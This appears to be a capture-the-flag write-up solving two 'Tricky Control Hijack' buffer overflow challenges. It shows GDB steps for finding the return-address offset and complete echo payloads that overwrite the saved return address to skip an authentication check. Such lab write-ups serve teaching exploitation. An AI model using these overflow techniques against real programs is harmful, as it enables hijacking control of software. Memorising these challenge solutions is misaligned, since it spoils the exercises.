Skip to content

Tricky Control Hijack

Tricky Control Hijack (easy)

  1. GDB -> disas win_authed -> the address of instruction after auth check is 0x40203e

  2. As told in the debug output, the return address from challenge() is stored at 56 bytes from start of input buffer.

    shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x3e\x20\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-2-w

Tricky Control Hijack (hard)

  1. In gdb, disas win_authed and disas main, we get to know:

    • Instruction after auth check is at 0x00000000004021de
    • challenge() returns at 0x0000000000402441

  2. Set a breakpoint b *challenge+148, run and give a short string of a's as input

  3. info frame -> rbp is at 0x7ffd1df81e00
  4. x/100xg $rbp-200:
    • input buffer starts at 0x7ffd1df81db0, which is rbp-0x50 = rbp-80
    • return address is stored at 0x7ffd1df81e08, which is rbp+0x8 = rbp+8

  5. 88 a's followed by desired address:

    shell echo -n -e "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xde\x21\x40\x00\x00\x00\x00\x00" | /challenge/binary-exploitation-control-hijack-2